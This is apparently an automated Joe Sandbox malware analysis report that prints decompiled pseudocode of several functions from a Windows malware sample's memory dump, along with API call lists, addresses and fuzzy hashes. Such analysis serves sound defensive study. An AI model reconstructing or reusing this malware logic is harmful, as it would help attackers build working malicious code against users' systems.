            0x047e4e2a
            0x047e4e2a
            0x047e4e82
            0x047e4e8e
            0x047e4e84
            0x047e4e87
            0x047e4e87
            0x047e4e82
            0x047e4dfb
            0x00000000
            0x047e4dc2
            0x047e4d6b
            0x047e4d6e
            0x047e4d75
            0x047e4d7b
            0x047e4d7e
            0x047e4d80
            0x047e4d8c
            0x047e4d8f
            0x047e4d8f
            0x047e4d95
            0x047e4d9a
            0x047e4d9a
            0x047e4da0
            0x00000000
            0x047e4da0
            0x047e4cae
            0x00000000
            0x047e4cd5
            0x047e4cd5
            0x047e4ce1
            0x047e4cf4
            0x047e4cfa
            0x047e4d02
            0x00000000
            0x047e4d02

            APIs
            • StrChrA.SHLWAPI(047E6A76,0000005F,00000000,00000000,00000104), ref: 047E4CC7
            • lstrcpy.KERNEL32(?,?), ref: 047E4CF4
              • Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
              • Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
              • Part of subcall function 047E6536: memset.NTDLL ref: 047E6578
              • Part of subcall function 047E5B0E: lstrlenW.KERNEL32(?,?,?,047E4E5D,3D047E90,80000002,047E6A76,047E57D1,74666F53,4D4C4B48,047E57D1,?,3D047E90,80000002,047E6A76,?), ref: 047E5B33
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • lstrcpy.KERNEL32(?,00000000), ref: 047E4D16
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
            • String ID: ($\
            • API String ID: 3924217599-1512714803
            • Opcode ID: 565af2424e3f25726c3a8f36c115c2519f5e56d2ec07e2086386c15d1d4777a4
            • Instruction ID: fd590b370950bb0d59b0c7792e3afc4beae65a433a478afb231f653c8a62eca3
            • Opcode Fuzzy Hash: 565af2424e3f25726c3a8f36c115c2519f5e56d2ec07e2086386c15d1d4777a4
            • Instruction Fuzzy Hash: 71512972100209FFDF129FA6DD44EFA7BBAEF0C358F008658FA1596260D735E925AB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E047E454F(void* __eax, void* __ecx) {
            				char _v8;
            				void* _v12;
            				intOrPtr _v16;
            				char _v20;
            				void* __esi;
            				intOrPtr _t36;
            				intOrPtr* _t37;
            				intOrPtr* _t39;
            				void* _t53;
            				long _t58;
            				void* _t59;
            
            				_t53 = __ecx;
            				_t59 = __eax;
            				_t58 = 0;
            				ResetEvent( *(__eax + 0x1c));
            				_push( &_v8);
            				_push(4);
            				_push( &_v20);
            				_push( *((intOrPtr*)(_t59 + 0x18)));
            				if( *0x47ea160() != 0) {
            					L5:
            					if(_v8 == 0) {
            						 *((intOrPtr*)(_t59 + 0x30)) = 0;
            						L21:
            						return _t58;
            					}
            					 *0x47ea174(0, 1,  &_v12);
            					if(0 != 0) {
            						_t58 = 8;
            						goto L21;
            					}
            					_t36 = E047E33DC(0x1000);
            					_v16 = _t36;
            					if(_t36 == 0) {
            						_t58 = 8;
            						L18:
            						_t37 = _v12;
            						 *((intOrPtr*)( *_t37 + 8))(_t37);
            						goto L21;
            					}
            					_push(0);
            					_push(_v8);
            					_push( &_v20);
            					while(1) {
            						_t39 = _v12;
            						_t56 =  *_t39;
            						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
            						ResetEvent( *(_t59 + 0x1c));
            						_push( &_v8);
            						_push(0x1000);
            						_push(_v16);
            						_push( *((intOrPtr*)(_t59 + 0x18)));
            						if( *0x47ea160() != 0) {
            							goto L13;
            						}
            						_t58 = GetLastError();
            						if(_t58 != 0x3e5) {
            							L15:
            							E047E61DA(_v16);
            							if(_t58 == 0) {
            								_t58 = E047E2B18(_v12, _t59);
            							}
            							goto L18;
            						}
            						_t58 = E047E16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
            						if(_t58 != 0) {
            							goto L15;
            						}
            						_t58 =  *((intOrPtr*)(_t59 + 0x28));
            						if(_t58 != 0) {
            							goto L15;
            						}
            						L13:
            						_t58 = 0;
            						if(_v8 == 0) {
            							goto L15;
            						}
            						_push(0);
            						_push(_v8);
            						_push(_v16);
            					}
            				}
            				_t58 = GetLastError();
            				if(_t58 != 0x3e5) {
            					L4:
            					if(_t58 != 0) {
            						goto L21;
            					}
            					goto L5;
            				}
            				_t58 = E047E16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
            				if(_t58 != 0) {
            					goto L21;
            				}
            				_t58 =  *((intOrPtr*)(_t59 + 0x28));
            				goto L4;
            			}














            0x047e454f
            0x047e455e
            0x047e4563
            0x047e4565
            0x047e456a
            0x047e456b
            0x047e4570
            0x047e4571
            0x047e457c
            0x047e45ad
            0x047e45b2
            0x047e4675
            0x047e4678
            0x047e467e
            0x047e467e
            0x047e45bf
            0x047e45c7
            0x047e4672
            0x00000000
            0x047e4672
            0x047e45d2
            0x047e45d7
            0x047e45dc
            0x047e4664
            0x047e4665
            0x047e4665
            0x047e466b
            0x00000000
            0x047e466b
            0x047e45e2
            0x047e45e4
            0x047e45ea
            0x047e45eb
            0x047e45eb
            0x047e45ee
            0x047e45f1
            0x047e45f7
            0x047e45fc
            0x047e45fd
            0x047e4602
            0x047e4605
            0x047e4610
            0x00000000
            0x00000000
            0x047e4618
            0x047e4620
            0x047e4649
            0x047e464c
            0x047e4653
            0x047e465e
            0x047e465e
            0x00000000
            0x047e4653
            0x047e462c
            0x047e4630
            0x00000000
            0x00000000
            0x047e4632
            0x047e4637
            0x00000000
            0x00000000
            0x047e4639
            0x047e4639
            0x047e463e
            0x00000000
            0x00000000
            0x047e4640
            0x047e4641
            0x047e4644
            0x047e4644
            0x047e45eb
            0x047e4584
            0x047e458c
            0x047e45a5
            0x047e45a7
            0x00000000
            0x00000000
            0x00000000
            0x047e45a7
            0x047e4598
            0x047e459c
            0x00000000
            0x00000000
            0x047e45a2
            0x00000000

            APIs
            • ResetEvent.KERNEL32(?), ref: 047E4565
            • GetLastError.KERNEL32 ref: 047E457E
              • Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD
            • ResetEvent.KERNEL32(?), ref: 047E45F7
            • GetLastError.KERNEL32 ref: 047E4612
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ErrorEventLastReset$MultipleObjectsWait
            • String ID: @MetNet
            • API String ID: 2394032930-2109406137
            • Opcode ID: 34a50d33cd8611ec81591d12fa47fee36d969accc8c9a1333489be9525cb7179
            • Instruction ID: 8616bd8cef918f67b0d3fad546bfbb0c1b8b8d6ca419953b640002041dc80994
            • Opcode Fuzzy Hash: 34a50d33cd8611ec81591d12fa47fee36d969accc8c9a1333489be9525cb7179
            • Instruction Fuzzy Hash: 06319032A00604EBDB219FA7D848EBE77B9FF8C254F154768E551A7290EB30F9459B10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E047E607C() {
            				void* _v0;
            				void** _t3;
            				void** _t5;
            				void** _t7;
            				void** _t8;
            				void* _t10;
            
            				_t3 =  *0x47ea3cc; // 0x5429600
            				__imp__( &(_t3[0x10]));
            				while(1) {
            					_t5 =  *0x47ea3cc; // 0x5429600
            					_t1 =  &(_t5[0x16]); // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t7 =  *0x47ea3cc; // 0x5429600
            				_t10 =  *_t7;
            				if(_t10 != 0 && _t10 != 0x47eb142) {
            					HeapFree( *0x47ea2d8, 0, _t10);
            					_t7 =  *0x47ea3cc; // 0x5429600
            				}
            				 *_t7 = _v0;
            				_t8 =  &(_t7[0x10]);
            				__imp__(_t8);
            				return _t8;
            			}









            0x047e607c
            0x047e6085
            0x047e6095
            0x047e6095
            0x047e609a
            0x047e609f
            0x00000000
            0x00000000
            0x047e608f
            0x047e608f
            0x047e60a1
            0x047e60a6
            0x047e60aa
            0x047e60bd
            0x047e60c3
            0x047e60c3
            0x047e60cc
            0x047e60ce
            0x047e60d2
            0x047e60d8

            APIs
            • RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E6085
            • Sleep.KERNEL32(0000000A), ref: 047E608F
            • HeapFree.KERNEL32(00000000), ref: 047E60BD
            • RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E60D2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uet
            • API String ID: 58946197-2766386878
            • Opcode ID: 55f6060345c3e72e06d667e0611adf5cf488f01b38df5fa112f1e8e68cf9735b
            • Instruction ID: fff05d61309ea090e5b6e272e47fd6c31129501f0f00445911088dd6d0c19f4d
            • Opcode Fuzzy Hash: 55f6060345c3e72e06d667e0611adf5cf488f01b38df5fa112f1e8e68cf9735b
            • Instruction Fuzzy Hash: 32F0D4B52002029BE728CF57D849EA57BB5EB9C711B48CB18EA02DF391D638BC44DA25
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E047E35D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
            				void* _v8;
            				char _v48;
            				void* __edi;
            				intOrPtr _t22;
            				intOrPtr _t30;
            				intOrPtr _t34;
            				intOrPtr* _t42;
            				void* _t43;
            				void* _t46;
            				intOrPtr* _t48;
            				void* _t49;
            				intOrPtr _t51;
            
            				_t42 = _a16;
            				_t48 = __eax;
            				_t22 =  *0x47ea348; // 0xc3d5a8
            				_t2 = _t22 + 0x47eb7bb; // 0x657a6973
            				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
            				if( *0x47ea2ec >= 5) {
            					_t30 = E047E3CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
            					L5:
            					_a4 = _t30;
            					L6:
            					if(_a4 != 0) {
            						L9:
            						 *0x47ea2ec =  *0x47ea2ec + 1;
            						L10:
            						return _a4;
            					}
            					_t50 = _a16;
            					 *_t48 = _a16;
            					_t49 = _v8;
            					 *_t42 = E047E56B9(_t50, _t49);
            					_t34 = E047E77A5(_t49, _t50);
            					if(_t34 != 0) {
            						 *_a8 = _t49;
            						 *_a12 = _t34;
            						if( *0x47ea2ec < 5) {
            							 *0x47ea2ec =  *0x47ea2ec & 0x00000000;
            						}
            						goto L10;
            					}
            					_a4 = 0xbf;
            					E047E63F6();
            					HeapFree( *0x47ea2d8, 0, _t49);
            					goto L9;
            				}
            				_t51 =  *0x47ea3e0; // 0x5429c08
            				if(RtlAllocateHeap( *0x47ea2d8, 0, 0x800) == 0) {
            					_a4 = 8;
            					goto L6;
            				}
            				_t30 = E047E2B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
            				goto L5;
            			}















            0x047e35d9
            0x047e35e0
            0x047e35e4
            0x047e35e9
            0x047e35f4
            0x047e3604
            0x047e3653
            0x047e3658
            0x047e3658
            0x047e365b
            0x047e365f
            0x047e3699
            0x047e3699
            0x047e369f
            0x047e36a6
            0x047e36a6
            0x047e3661
            0x047e3664
            0x047e3666
            0x047e3673
            0x047e3675
            0x047e367c
            0x047e36b3
            0x047e36b8
            0x047e36ba
            0x047e36bc
            0x047e36bc
            0x00000000
            0x047e36ba
            0x047e367e
            0x047e3685
            0x047e3693
            0x00000000
            0x047e3693
            0x047e3606
            0x047e3621
            0x047e363b
            0x00000000
            0x047e363b
            0x047e3634
            0x00000000

            APIs
            • wsprintfA.USER32 ref: 047E35F4
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E3619
              • Part of subcall function 047E2B91: GetTickCount.KERNEL32 ref: 047E2BA8
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2BF5
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C12
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C34
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C5B
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C7C
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2CA7
              • Part of subcall function 047E2B91: HeapFree.KERNEL32(00000000,?), ref: 047E2CBA
            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 047E3693
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: wsprintf$Heap$Free$AllocateCountTick
            • String ID: Uet
            • API String ID: 1307794992-2766386878
            • Opcode ID: f6669da5961682b85cc138715e7646d2bf108688333cdebc4d1b5a8ea8e8300e
            • Instruction ID: eedd24bb13928021037134a6b8721f9a296daaa896148a79b888c2cd0c2b45e9
            • Opcode Fuzzy Hash: f6669da5961682b85cc138715e7646d2bf108688333cdebc4d1b5a8ea8e8300e
            • Instruction Fuzzy Hash: 3F314D72600108EBDB01DFA6D984AEA3BBCFB4C345F108622E901EB341D734A944DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E047E6CDF(intOrPtr* __eax) {
            				void* _v8;
            				WCHAR* _v12;
            				void* _v16;
            				char _v20;
            				void* _v24;
            				intOrPtr _v28;
            				void* _v32;
            				intOrPtr _v40;
            				short _v48;
            				intOrPtr _v56;
            				short _v64;
            				intOrPtr* _t54;
            				intOrPtr* _t56;
            				intOrPtr _t57;
            				intOrPtr* _t58;
            				intOrPtr* _t60;
            				void* _t61;
            				intOrPtr* _t63;
            				intOrPtr* _t65;
            				short _t67;
            				intOrPtr* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t72;
            				intOrPtr* _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr* _t83;
            				intOrPtr* _t87;
            				intOrPtr _t103;
            				intOrPtr _t109;
            				void* _t118;
            				void* _t122;
            				void* _t123;
            				intOrPtr _t130;
            
            				_t123 = _t122 - 0x3c;
            				_push( &_v8);
            				_push(__eax);
            				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
            				if(_t118 >= 0) {
            					_t54 = _v8;
            					_t103 =  *0x47ea348; // 0xc3d5a8
            					_t5 = _t103 + 0x47eb038; // 0x3050f485
            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
            					_t56 = _v8;
            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
            					if(_t118 >= 0) {
            						__imp__#2(0x47e9284);
            						_v28 = _t57;
            						if(_t57 == 0) {
            							_t118 = 0x8007000e;
            						} else {
            							_t60 = _v32;
            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
            							_t87 = __imp__#6;
            							_t118 = _t61;
            							if(_t118 >= 0) {
            								_t63 = _v24;
            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
            								if(_t118 >= 0) {
            									_t130 = _v20;
            									if(_t130 != 0) {
            										_t67 = 3;
            										_v64 = _t67;
            										_v48 = _t67;
            										_v56 = 0;
            										_v40 = 0;
            										if(_t130 > 0) {
            											while(1) {
            												_t68 = _v24;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t123 = _t123;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
            												if(_t118 < 0) {
            													goto L16;
            												}
            												_t70 = _v8;
            												_t109 =  *0x47ea348; // 0xc3d5a8
            												_t28 = _t109 + 0x47eb0e4; // 0x3050f1ff
            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
            												if(_t118 >= 0) {
            													_t75 = _v16;
            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
            													if(_t118 >= 0 && _v12 != 0) {
            														_t79 =  *0x47ea348; // 0xc3d5a8
            														_t33 = _t79 + 0x47eb078; // 0x76006f
            														if(lstrcmpW(_v12, _t33) == 0) {
            															_t83 = _v16;
            															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
            														}
            														 *_t87(_v12);
            													}
            													_t77 = _v16;
            													 *((intOrPtr*)( *_t77 + 8))(_t77);
            												}
            												_t72 = _v8;
            												 *((intOrPtr*)( *_t72 + 8))(_t72);
            												_v40 = _v40 + 1;
            												if(_v40 < _v20) {
            													continue;
            												}
            												goto L16;
            											}
            										}
            									}
            								}
            								L16:
            								_t65 = _v24;
            								 *((intOrPtr*)( *_t65 + 8))(_t65);
            							}
            							 *_t87(_v28);
            						}
            						_t58 = _v32;
            						 *((intOrPtr*)( *_t58 + 8))(_t58);
            					}
            				}
            				return _t118;
            			}





































            0x047e6ce4
            0x047e6ced
            0x047e6cee
            0x047e6cf2
            0x047e6cf8
            0x047e6cfe
            0x047e6d07
            0x047e6d0d
            0x047e6d17
            0x047e6d19
            0x047e6d1f
            0x047e6d24
            0x047e6d2f
            0x047e6d35
            0x047e6d3a
            0x047e6e5c
            0x047e6d40
            0x047e6d40
            0x047e6d4d
            0x047e6d53
            0x047e6d59
            0x047e6d5d
            0x047e6d63
            0x047e6d70
            0x047e6d74
            0x047e6d7a
            0x047e6d7d
            0x047e6d85
            0x047e6d86
            0x047e6d8a
            0x047e6d8e
            0x047e6d91
            0x047e6d94
            0x047e6d9a
            0x047e6da3
            0x047e6da9
            0x047e6daa
            0x047e6dad
            0x047e6dae
            0x047e6daf
            0x047e6db7
            0x047e6db8
            0x047e6db9
            0x047e6dbb
            0x047e6dbf
            0x047e6dc3
            0x00000000
            0x00000000
            0x047e6dc9
            0x047e6dd2
            0x047e6dd8
            0x047e6de2
            0x047e6de6
            0x047e6de8
            0x047e6df5
            0x047e6df9
            0x047e6e01
            0x047e6e06
            0x047e6e18
            0x047e6e1a
            0x047e6e20
            0x047e6e20
            0x047e6e29
            0x047e6e29
            0x047e6e2b
            0x047e6e31
            0x047e6e31
            0x047e6e34
            0x047e6e3a
            0x047e6e3d
            0x047e6e46
            0x00000000
            0x00000000
            0x00000000
            0x047e6e46
            0x047e6d9a
            0x047e6d94
            0x047e6d7d
            0x047e6e4c
            0x047e6e4c
            0x047e6e52
            0x047e6e52
            0x047e6e58
            0x047e6e58
            0x047e6e61
            0x047e6e67
            0x047e6e67
            0x047e6d24
            0x047e6e70

            APIs
            • SysAllocString.OLEAUT32(047E9284), ref: 047E6D2F
            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 047E6E10
            • SysFreeString.OLEAUT32(00000000), ref: 047E6E29
            • SysFreeString.OLEAUT32(?), ref: 047E6E58
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$Free$Alloclstrcmp
            • String ID:
            • API String ID: 1885612795-0
            • Opcode ID: 3cdd936822c7c48635eb1bb4557e557e005c4d6d101b97dabdcc4ab672bf19dc
            • Instruction ID: 38d9964df5459dcf5b565f1c2a152e02f714745bcdafa21a1c482f37a6bb8c94
            • Opcode Fuzzy Hash: 3cdd936822c7c48635eb1bb4557e557e005c4d6d101b97dabdcc4ab672bf19dc
            • Instruction Fuzzy Hash: 92512B75D00519EFCB01DFA9C8889AEB7BAFF8C704B148698E915EB350D731AD41CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(?), ref: 047E59B8
            • SysFreeString.OLEAUT32(00000000), ref: 047E5A9D
              • Part of subcall function 047E6CDF: SysAllocString.OLEAUT32(047E9284), ref: 047E6D2F
            • SafeArrayDestroy.OLEAUT32(00000000), ref: 047E5AF0
            • SysFreeString.OLEAUT32(00000000), ref: 047E5AFF
              • Part of subcall function 047E77E3: Sleep.KERNEL32(000001F4), ref: 047E782B
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree$ArrayDestroySafeSleep
            • String ID:
            • API String ID: 3193056040-0
            • Opcode ID: a865d52ea5e135ff722db4454274316773df88ac871951a4b28f9d384e58cf66
            • Instruction ID: 396af864accc062d9ba1e8166234422c27628c5516bfb750b93c1f8faae5a853
            • Opcode Fuzzy Hash: a865d52ea5e135ff722db4454274316773df88ac871951a4b28f9d384e58cf66
            • Instruction Fuzzy Hash: 1A514B76500609BFDB11DFA9C888AAEBBB6FF8C704B148A29E505DB310DB35ED45CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E047E4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void _v156;
            				void _v428;
            				void* _t55;
            				unsigned int _t56;
            				signed int _t66;
            				signed int _t74;
            				void* _t76;
            				signed int _t79;
            				void* _t81;
            				void* _t92;
            				void* _t96;
            				signed int* _t99;
            				signed int _t101;
            				signed int _t103;
            				void* _t107;
            
            				_t92 = _a12;
            				_t101 = __eax;
            				_t55 = E047E61EF(_a16, _t92);
            				_t79 = _t55;
            				if(_t79 == 0) {
            					L18:
            					return _t55;
            				}
            				_t56 =  *(_t92 + _t79 * 4 - 4);
            				_t81 = 0;
            				_t96 = 0x20;
            				if(_t56 == 0) {
            					L4:
            					_t97 = _t96 - _t81;
            					_v12 = _t96 - _t81;
            					E047E6725(_t79,  &_v428);
            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E047E7477(_t101,  &_v428, _a8, _t96 - _t81);
            					E047E7477(_t79,  &_v156, _a12, _t97);
            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
            					_t66 = E047E6725(_t101, 0x47ea1d0);
            					_t103 = _t101 - _t79;
            					_a8 = _t103;
            					if(_t103 < 0) {
            						L17:
            						E047E6725(_a16, _a4);
            						E047E7894(_t79,  &_v428, _a4, _t97);
            						memset( &_v428, 0, 0x10c);
            						_t55 = memset( &_v156, 0, 0x84);
            						goto L18;
            					}
            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
            					do {
            						if(_v8 != 0xffffffff) {
            							_push(1);
            							_push(0);
            							_push(0);
            							_push( *_t99);
            							L047E82DA();
            							_t74 = _t66 +  *(_t99 - 4);
            							asm("adc edx, esi");
            							_push(0);
            							_push(_v8 + 1);
            							_push(_t92);
            							_push(_t74);
            							L047E82D4();
            							if(_t92 > 0 || _t74 > 0xffffffff) {
            								_t74 = _t74 | 0xffffffff;
            								_v16 = _v16 & 0x00000000;
            							}
            						} else {
            							_t74 =  *_t99;
            						}
            						_t106 = _t107 + _a8 * 4 - 0x1a8;
            						_a12 = _t74;
            						_t76 = E047E5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
            						while(1) {
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							L13:
            							_t92 =  &_v156;
            							if(E047E6E71(_t79, _t92, _t106) < 0) {
            								break;
            							}
            							L14:
            							_a12 = _a12 + 1;
            							_t76 = E047E10A0(_t79,  &_v156, _t106, _t106);
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							goto L13;
            						}
            						_a8 = _a8 - 1;
            						_t66 = _a12;
            						_t99 = _t99 - 4;
            						 *(0x47ea1d0 + _a8 * 4) = _t66;
            					} while (_a8 >= 0);
            					_t97 = _v12;
            					goto L17;
            				}
            				while(_t81 < _t96) {
            					_t81 = _t81 + 1;
            					_t56 = _t56 >> 1;
            					if(_t56 != 0) {
            						continue;
            					}
            					goto L4;
            				}
            				goto L4;
            			}





















            0x047e4784
            0x047e4790
            0x047e4796
            0x047e479b
            0x047e479f
            0x047e4911
            0x047e4915
            0x047e4915
            0x047e47a5
            0x047e47a9
            0x047e47ad
            0x047e47b0
            0x047e47bb
            0x047e47c1
            0x047e47c6
            0x047e47c9
            0x047e47e3
            0x047e47f2
            0x047e47fe
            0x047e4808
            0x047e480d
            0x047e480f
            0x047e4812
            0x047e48c9
            0x047e48cf
            0x047e48e0
            0x047e48f3
            0x047e4909
            0x00000000
            0x047e490e
            0x047e481b
            0x047e4822
            0x047e4826
            0x047e482c
            0x047e482e
            0x047e4830
            0x047e4832
            0x047e4834
            0x047e483e
            0x047e4843
            0x047e4845
            0x047e4847
            0x047e4848
            0x047e4849
            0x047e484a
            0x047e4851
            0x047e4858
            0x047e485b
            0x047e485b
            0x047e4828
            0x047e4828
            0x047e4828
            0x047e4863
            0x047e486b
            0x047e4877
            0x047e487c
            0x047e487c
            0x047e4881
            0x00000000
            0x00000000
            0x047e4883
            0x047e4886
            0x047e4893
            0x00000000
            0x00000000
            0x047e4895
            0x047e4895
            0x047e48a2
            0x047e487c
            0x047e4881
            0x00000000
            0x00000000
            0x00000000
            0x047e4881
            0x047e48ac
            0x047e48af
            0x047e48b2
            0x047e48b9
            0x047e48b9
            0x047e48c6
            0x00000000
            0x047e48c6
            0x047e47b2
            0x047e47b6
            0x047e47b7
            0x047e47b9
            0x00000000
            0x00000000
            0x00000000
            0x047e47b9
            0x00000000

            APIs
            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 047E4834
            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 047E484A
            • memset.NTDLL ref: 047E48F3
            • memset.NTDLL ref: 047E4909
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: memset$_allmul_aulldiv
            • String ID:
            • API String ID: 3041852380-0
